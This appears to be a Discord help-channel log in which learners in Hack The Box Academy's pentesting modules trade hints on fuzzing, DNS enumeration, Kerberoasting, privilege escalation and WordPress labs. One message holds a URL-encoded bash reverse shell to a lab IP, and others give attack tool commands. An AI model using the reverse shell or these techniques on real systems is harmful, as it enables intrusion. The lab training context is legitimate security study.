@tulip jasper if you want to use the other shell for some reason go on CyberChef pick url encode and check the encode all special chars box and you can use that payload for this if you want
Hey there, you are the person that tried to help and I've replied to yesterday
What process did you use to get to the last flag of the last section?
Editing the PHP file as you said is not an option sadly as I said here: #modules message 
Sorry, I missed this message yesterday.
You probably just added your PHP code.
First delete all code in the 404.php and then add your code.
Thank you! I will try this since the python version doesn't work either. I'm sure I messed up something and it's something really simple, but don't know what.
wait what? that also doesn't work?
oh yeah did you change your payload or are you still using the run id payload?
im doing the attacking web apps with ffuf and im on directory fuzzing section, im running command|| ffuf -w wordlist:FUZZ -u http://ip:port/blog/FUZZ|| but its not working?
the hint says "All lowercase" lol makes no sense
I changed the payload
if you confirm you have RCE with that payload and both the python payload and the urlcode version of the previous payload doesn't work then i'm out of idea
What's not making sense does the fuzzing scan work?
What error you're receiving
WTF 🤣
You have at least enough time
Hi payloadbunny
Could you give any advice on attacking common applications- attacking Thick clients applications..
I get to following the memory map in x64dbg and dumping all user maps with -rw--
But always receiving error with de4dot that it's not .net bin file
I have not done this section yet, sorry
Stay away if you want your sanity
Anyone feel free to dm me if you've solved the above
Wasted 3days
Which one are you debugging? If its Restart-Oracle-Services.exe then you just ||need to step through the program until the banner appears||. Then go ||look in the c:\programdata folder||. Then you just need to look at what you have, and keep iterating that process.
Literally the instructions are pretty step by step.
Correct its the restart-oracle-services exe
So I just keep repeating the steps till it works
Can anyone help me with the Module: Login Brute Forcing; Section: Skills Assessment /Website (the first part of skills assessment)?
I keep getting hydra to return valid passwords to me for multiple different usernames and none of them work and open the website. I've used usernames "user", "admin", "b.gates".. My hydra commands always return passwords for these users but they do not work
The steps as shown in the chapter are exactly what you need to do
No worries about the missed message, might be cause I use the reply function without pinging, since many people get annoyed for pings on discord and I don't want to bother anyone
Anyways it still will not work, the error message that spawns after I try to update the code is: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
Either my machine has a bug (which would be weird, but not impossible) or this is not the way you've completed the module 
I'll reset and retry
Additionally this has taken me so long that I've had to respawn my machine and get new IP / port pairs like 4 times now ... any help would be appreciated I am hella frustrated rn
There was an issue previously where the screenshots didn't quite line up, when debugging the restart-services.exe (note: not Restart-Oracle-Services.exe), and it confused a lot of people. But now its pretty straight forward to follow along.
I try to help pretty much everyone here. So feel free to ping me if I don't respond. At the latest when I'm back online, I'll see your message then
Send me the commands you used via DM (so as not to spoil here), and I'll be happy to take a look.
bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.24/4443%200%3E%261%27
i was correct.
Send me a DM, I am slowly losing track here
so what was the outcome?
Sadly, my note taking wasn't as thorough back then. But looking at my notes, it may be that ||the POST variables and form name you are using|| may not be correct.
its just not discovering any
directories
i used the same wordlist they did in the section
🤷 :/
i'll go take a relook into the module
hold up
thanks!
the directory is not under blog
you're not meant to search recursively
you're meant to search for things like /blog, /something
not /blog/something, /blog/somethingelse
Searching recursively would be the 2nd line i mentioned
oh soo, just http:/ip/FUZZ?
not under the blog dir
yes, no /blog/FUZZ
ohhh okay thanks
you can also choose to search recursively if you want, but honestly i use feroxbuster for directory fuzzing most of the time, ffuf i use more for misc usages like bruteforcing.
feroxbuster is very fast, though.
You wouldn't use it in actual pentest if the rules have a maximum request rate.
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://178.62.68.209:30537/FUZZ
i used this baove
above
oh
use -fs 986
it doesn't seem like your fuzzing isn't working
it's more like your terminal is messed up, probably cuz it's built into the web browser (ur on pwnbox)
so it bugs and continuously spams ur terminal
add that to my cmd?
add -fs 986 -od test
ur terminal is messed up so adding any form of outputting to a file/folder will let you see the actual results
-od creates a directory that stores matching entries
you can ctrl + c out of the command cuz there's only 2 noteworthy directories to find btw
this is because your terminal is too small 🤣
he's on pwnbox so i'd assume that's why XD
that or he's genuinely running it on a very small dimension
i'm guessing the error is from the copyright thing in the wordlist you can just follow the first or second section note with using the -ic tag to ignore that
oh no i think there is a note on the first or second section about using that wordlist
i think to make thing faster because the goal of this module is using the ffuf tool not waiting the like the Fing password attack module 🤣
small dimension as in window size.
He can just use the bitquark's subdomains and it'll still work.
yea i misread that my brain is 50% dead so it's autocomplete thing
is aight
Hey guys is anyone having any good resource to learn IoT pentesting? I would appreciate the help Or any sorts of material shared or something
```java
/* 123 */ String methodName = (new Object() { }).getClass().getEnclosingMethod().getName();
/* 124 */ logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
/* 125 */ if (AccessCheck.checkAccess(methodName, this.user)) {
/* 126 */ return "Error: Method '" + methodName + "' is not allowed for this user account";
/* */ }
/* */
/* 129 */ this.action = new ActionMessage(this.sessionID, "open");
/* 130 */ this.action.addArgument(foldername);
/* 131 */ this.action.addArgument(filename);
/* 132 */ sendAndRecv();
/* 133 */ String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
/* 134 */ FileOutputStream fos = new FileOutputStream(desktopPath);
/* */ if (this.response.hasError()) {
/* 136 */ return "Error: Your action caused an error on the application server!";
/* */ }
/* 138 */
/* 139 */ byte[] content = this.response.getContent();
/* 140 */ fos.write(content);
/* */ fos.close();
/* 142 */
/* */ return "Successfully saved the file to " + desktopPath;
/* */ }
```
someone could help me with this?
it says I have an error in the line 134
```
fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */ FileOutputStream fos = new FileOutputStream(desktopPath);
^
symbol: class FileOutputStream
location: class Invoker
fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */ FileOutputStream fos = new FileOutputStream(desktopPath);
^
symbol: class FileOutputStream
location: class Invoker
2 errors
```
I'm having an issue getting the instructions from the Python Library Hijacking section in Linux Privilege Escalation to work. I've tried changing the payload to 777 using chmod and adjusting the file paths in my script to launch the attack. Nothing seems to be working. Does anyone have any hints or tips for this section?
The error I keep getting is that I don't have permission to use the payload even though it's my payload and I have full permissions over it.
Do you still have problems? In case I'll dm you
Yes, I'm not understanding this one at all. I really appreciate it!
Can anyone just give me the initial foothold for the password attack medium lab
I cba trying for hours and hours to get in
Thanks
Find a file and crack it .. depending on what is services working in ports
Yeah I gathered that lol but the bruteforcing is taking ages
Like 2+hours
Then my box expired
I'm pissed icl
Are you using resources wordlist?
Yeah
I used the password list
That came up empty
Then mutated
Mutated took too long
What thread do I have to use
Slight understatement
Also am I correct in using ftp as ssh and ftp use them details
After get credentials Enumerate about services sharing file learning in module ..
I'm afraid to spoil challenges, I'm not good at giving hints
🥲
All good bro you've been helpful
I am working on the last portion of the Attacking Common Services Hard Lab. I am logged into the DB as the F****** user, and I am able to impersonate the J**** user. It does not show the user to have sysadmin privileges which I don't think is an issue, but I am struggling to execute commands on the linked server now and I am not sure what is wrong with my syntax.
Hello good day everyone
I want to learn cryptography wallet crashing and hacking, how to go about it?
Did I miss something, or am I not supposed to be able to execute commands with xp_commandshell?
In the module it shows how to execute on linked server
Not the channel to be asking that question, this is specifically for questions/discussions related to modules.
Would you please direct me where I can ask these questions
You want to hack crypto wallets?
Yes
How exactly will you do that legally?
You wouldn't ask for it here, you can ask in the #1024429874246590575 or #general (despite it not being a useful place).
#modules is only for HTB Academy's supported modules
No hell , it took me time and money to find the link to this community
Shouldn't ask about it anywhere since hacking crypto wallets is illegal
it's literally free and public but ok
they might be pentesting for a crypto company or whatever
Basically asking us how to steal someone's wallet
Isn't the group about illegal stuffs
It does not seem to be passing the commands to that server
No lmfao
Yes of course
<@&861185840277487616>
Well i'll let mods handle
No. lol. It's not.
Tell me what it's all about
lol
Key word: "ethical" pentesting
If you're genuinely trying to figure out how to hack people's crypto wallets then ur in the wrong place
By joining you should have read the welcome banner, and also the #welcome channel
Plus the description of the server

exactly where i told them to go but they just ignored me
The guy who watched a youtube video about a guy who got millions hacking crypto wallets

Ahhh nevermind I figured it out, thanks. I was just overcomplicating it for no reason
I think there actually are jobs for people to pentest the security of crypto related stuff.
But if bro rlly wants that $$$ then he's in the wrong hood.
Good job

Tell me about it
Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.
Amazing resource 🫡
I am starting to prefer chat gpt for all but yea
google still god tier lol
you learn pentesting from the start first, you don't just go straight into cracking them
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
That is what everybody thinks
for a good reason.
Unless you have prior experience in a tech field
top people start from the roof

then they start building the bases
https://academy.hackthebox.com/module/113/section/2164 Attacking common applications - Exploiting Web Vulnerabilities in Thick-Client Applications --Last step of path traversal.
stupid question, but does parrot OS already have an internet browser installed? I was trying the "live engagement" exercise from the shells & payloads, but can't find a browser to use inside the parrot/pwnd machine.
open the terminal and enter firefox.
oh.. ok thank you.
Hey Guys
I'm stuck in dns footprinting
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I tried
dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
nslookup 10.129.75.61
for sub in $(cat /usr/share/SecLists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt);do dig $sub.inlanefreight.htb @10.129.75.61 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt dev.inlanefreight.htb
dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb dev.inlanefreight.htb
dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt dev.inlanefreight.htb
for sub in $(cat /opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt);do dig $sub.inlanefreight.htb @10.129.75.61 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
no luck
Someone have any hint?
There's a pretty 'fierce' wordlist you can use with dnsenum. I hope that helps.
Why are you trying to bruteforce the main zone. It gives you all the data voluntarily
??
Ok Thank you
Glad I could help.
I'm in the Sudo section in Linux Privilege Escalation. I've tried all of the examples shown and nothing I've tried seem to work with getting the flag. The box shows that it should be vulnerable to the Sudo Policy Bypass exploit, but when I try it to get the flag I get a permission denied error. Does anyone have any hints or clues on this one?
try ||sudo -l||
Yeah, I see that I have (ALL, !root) /bin/ncdu but I don't see any examples here in this section for exploiting that particular credential.
In the module, the attack is shown with a different tool, but in the end it works exactly the same.
Are you referring to the POC mentioned in the lesson? I'm trying that one right now.
Yes, in the module the attack is shown with a tool. The attack you need now works exactly as shown, just with a different tool
Okay, I'll see if I can figure out what tool that might be.
||sudo -l||
In "Kerberoasting - from Linux" when I add -request while using GetUserSPNs.py, in the output it prints [-] invalid principal syntax, so how to get the hashes?
try with -request-user <username>
Same
can you paste the command here in spoiler tags?
||GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/ -request||
but where is the user after "INLANEFREIGHT.LOCAL/"?
what should I write? it requires a password and I do not know what is the password?
dm you
Thank you! I got it!
I'm currently in the Polkit section in Linux Privilege Escalation and the pwnkit tool they want you to use isn't working. I'm getting an error of cannot create pwnkit/gconv-modules: Directory nonexistent. Has anyone come across this before in this section?
Any wordlist someone could recommend to fuzz .git?
Name the output differently than shown in the module. Example abc
So instead of ./pwnkit change it to something else? I'm not quite following what you mean.
Okay, I ran gcc to compile it this way instead $ gcc cve-2021-4034-poc.c -o abc and when I run ./abc I get the same error.
Okay, that is strange
Never mind. Once I removed the files and recompiled the exploit, I was able to get root.
Maybe restart the target
Thank you for your help!
Im stuck at enumerating Users in "attacking Gitlab" - what userlist should i use for it? I found like 10 Users, but none of them works for the task.... :/
--update: it was case sensitive, and i didnt try every version i got :))) --
Ah, I think you probably did what I did the first time. DM me.
Keep in mind the key WordPress directories discussed in the WordPress Structure section. Manually enumerate the target for any directories whose contents can be listed. Browse these directories and locate a flag with the file name flag.txt and submit its contents as the answer.
Hacking wordpress
Ive found an open directory, have searched for hours. Not finding much. What am I missing here.
For the Hacking Wordpress module - Login section : does anyone know the relevancy for the enumerating "all methods" question? What is the purpose of this?
Hello, i need help please. I can`t enter to HTB because it doesnt work in my country. I had never entered the web.
I cant get the support page either
Someone can help me?
sorry, if your country blocks access to HTB, there is nothing we can do here
How can i talk to support?
Maybe an email?
Via Website (green bubble)
With a significant amount of help from wolfiej, I completed the Adv SQLi module. I managed to (with a lot of struggle) get to the SA on my own, but once I got to the SA... ran into one hurdle after another. Leading up to the SA, best advice I can give is to carefully re-re-re-read the given module section, fully digesting everything, and then you'll (likely) realize that it's really not anywhere near as hard as you initially thought... (at least, that was my take). For the SA, remember that sometimes different tools have different results... and with that, if anyone needs a nudge on any part of the Advanced SQL Injections module, feel free to DM me.
I dont have permission to enter the web
Then the support can't help you either.
What exactly do you expect them to do?
When i try to login in it says this: Sorry, you have been blocked. You are unable to access hackthebox.com.
I am still struggling, but I will complete this module soon as well. A really great module.
if you were blocked by HTB, it has nothing to do with your country.
Then contact the support via Green Bubble. They will tell you how long you will be blocked.
I dont know what is Green Bubble, can you explain me?
Need to speak to a person? Learn how to reach our support via the Main Platform.
Thanks
I got the flag from the Skills Assessment of SQLmap essentials but it doesnt work
restarted machine and that was enough, a Y changed to a 7 in the flag
I'm pretty new in HackTheBox platform and haven't found solution why I can't get SSH connection to spawned IP address from Kali Virtual machine even I have initiated openvpn which I got from HackTheBox. It asks "Are you sure you want to continue connecting...." where I answer "yes" but after that it just says permission denied (publickey, password). What I do wrong
try a different algorithm, like "-o KexAlgorithms=ecdh-sha2-nistp521"
or try it with -vvv to get some more output to find the problem
at least that works for me on normal htb
is there any way of accessing a database in mysql whilst getting a access denied message
this is from the medium lab in password attacks
This did not work :/
Well that means you need to have either the rsa key or the password to connect
Is it prompting you for a password when you ssh to the box?
They are connected with the VPN they are having issues connecting to the box itself
u mind giving me a nudge @fathom pendant
im on the medium lab
ive got into ||mysql but when i try to get into the creds database it says access is denied for jason||
Follow the trail. Maybe you can find a different user
i have a feeling its in the ||creds database|| but i dont have access to that
is it in that one or the other one
Is it something really basic that I'm just missing or do u have to proper dig
I feel like something is broken in Logrotate for Linux Privilege escalation. I'm reasonably certain I'm performing the exploit correctly.
Not catching a shell
My notes just say I found creds in the server
hacking wordpress
Skills Assessment
Submit the contents of the flag file in the directory with directory listing enabled.
I have crawled the directories of three plugins, and I can't seem to find the flag. Can anyone give me a sanity check?
Fair enough thanks
That is the problem...before I am able to give any password it just says permission denied and goes back to beginning
Inside pwnbox I was able to get password query but inside VM Kali Linux it just did not work :/
Wondering if anyone can assist with this issue. I'm in the assessment for Linux Priv Escalation and on the 4th question. I have found the username and password for the tomcat admin account on the box. However, I can't seem to find a way to use them to get the flag. Anyone here able to assist with this?
I would have to check my notes now, but if you can log into Tomcat, you can upload a RevShell
Ah, there's an idea! Thank you!
hey everyone, i was doing the pivoting module and i was wondering the following: Lets say that you want to rdp to a host 2 hosts away. You have access to the two machines but not to the third one. Is it possible to make a tunnel from the third back to your attacking machine?
Not just 2, but any number - you just have to manage it all.
Thank you! I got it!
hacking wordpress
skills assessment
find the only non-admin user
I've found the users first name by browsing the webpage. Cant find the last name.
/wp-json/wp/v2/users doesnt appear to work. I cant find the user on the main page. Is there some other enumeration type from the module I should be doing to find this?
Did you do a wpscan?
I didnt, but will now. was trying to stick to that section of the modules tactics
thank you kindly
Yo plBunny, how hard was CBBH after taking CPTS (comparison)?
do they play into each other?
I did CBBH first.
Both exams are different.
While CBBH is about Bug Bounty Hunting, CPTS is a Network Pentest
I'm not trying to give htb ideas on how to take more of my money - but if they made a small practice exam environment for ... i dunno 10 bucks a month ... for practice for CBBH or CPTS exams - id buy it
They do not compare properly with each other
10 bucks would hardly cover the uptime of servers
they give you two exam attempts
thats more than enough
HTB offers you ProLabs to practice with. At least for CPTS
yeah ive done a good amount of the prolabs
I mean, thats kinda what zephyr is for
at least as far as their marketing is
the guide itself says zephyr and dante are prereqs for CPTS
recommended*
wait
its offshore and dante
🤷🏿‍♂️
Dante 🥄
CPTS 🥄🥄
Offshore 🥄🥄🥄
Oh thats good to know
i like your spoon rating
perhaps i will finish offshore before my attempt
Maybe they will make a lab focused on web app/bug bounty for cbbh
oh is that right, didnt know
yeah theyve also started marketing zephyr as being an analog in difficulty for CPTS as well
feels like theyre phasing out dante as the go to recommendation and replacing it with zephyr
well HTB does not like egotistical, so that wouldnt surprise me
Hello,
In Socks over RDP, when I use mstsc.exe (as administrator) with IP 172.16.6.155 and user jason, I do not even reach the password box. It says the remote computer is turned off or remote access is turned off or it is not available on the network.
I already respinned the target.
Hi @acoustic owl . Is there something super obvious that I am missing? I scanned the box remotely see replied message. It was an authenticated scan. I did this by entering the provided credentials in the credentials section of the scan. I also ssh into the box to try and find the scan results but not able to find. Thanks for your assistance.
I have completed this module for quite some time. At first glance it looks good. Open the scan and look at it closely
sometimes common ports get doubled ie 2222 for ssh and 8080 for http. its just a way of having the same service twice. 8080 is often used for dev
in your case 2222 is likely to help with learning pivoting
yup it's completely arbitrary
human monkey brain just likes symmetry
the only real rules are 1. cant use a port already in use if youre binding a new service and 2. low ports tend to require more permissions whereas higher ports are free real estate.
Guys can any one help me with this "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. "
What is your actual question
That's just the module question
What module are you doing?
I would suggest authenticating to the target host and then authenticating to the domain controller via ssh, afterwards id look through the loaded powershell modules for the flag.
That looks like windows command line one
And iirc the powershell module that will give the flag is clearly labeled
YES ITS window command Line: I am able to do all the authentication, but i am not able to see the flag in the modules. I've tried several methods but it didn't work. can you suggest me which powershell command or filter should i use?
now thats a real question
General Module of Windows Command Line
What's the command to see what modules are installed
have you considered consulting chatgpt?
Look through your notes because that command is in there
For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. this is it, and i am supposed to find the user's flag
a lot of people use chatgpt wrong, but this is actually a question that could be used for chatgpt.
that said its academy. 95% of the time its directly in the section info.
Have you ssh to the domain controller
yeah this struck me as a chatgpt help me along question
? I was saying you finally asked a real question instead of posting the module question which wasnt helpful.
yes i was able to connect succesfully but the only thing i am not able to extract the file
I was encouraging you for asking the real question better
You're not extracting any file
@oak kindle have you?
Just run the command to see which powershell modules are installed
yes
It will hit you like a brick
Ok
Alrighty
how can i extract the user's flag from among the loaded modules.
Brother
listen to MarcieLee, they already told you the correct answer
@oak kindle
Usually, modules can include different commands in themselves
Yes but iirc the command that shows modules also shows some of the internal commands of modules
I could be wrong tho
It's been a minute
if nothing else it tells you what modules you should even be looking for
Even then googling "how do I find commands of a powershell module" can help
but where?

I'm going to hurt someone at this point
lol
Check your notes for the command
Pay for chatgpt plus, you are going to need it.
Im gunna give benefit of the doubt and say that language barrier is screwing this person over hard
It's partially why I'm stating it in longer words
An example, if you load PowerView you will be presented with many different commands for that powershell module
^
yeah i think you were spot on
I think everybody does iirc
Hi @acoustic owl . Regarding the Nessus skills assessment, I carefully read through the scan and redid the scan by adding the ssh credentials. It appears that the ip address provided is a linux system not a windows system. This is significant because the questions ask about a windows system not a linux system.
That target that's spawned is a jump host. That has the scans already performed
And yes there is a Linux target and a windows target
Hi @fathom pendant. I checked out your hint about RDPing into the target but the port is closed.ssh was successful. I tried using nessuscli to find the scans but nessuscli was not installed on the jump host. Is there a concept that I am not understanding pertaining to jump host? thanks for your assistance.
I might be misremembering that module then
@fathom pendant I will try to use nessus on the jump host and then scan the ip address 172.16.16.100. I will let you know how it goes.
I did misremember
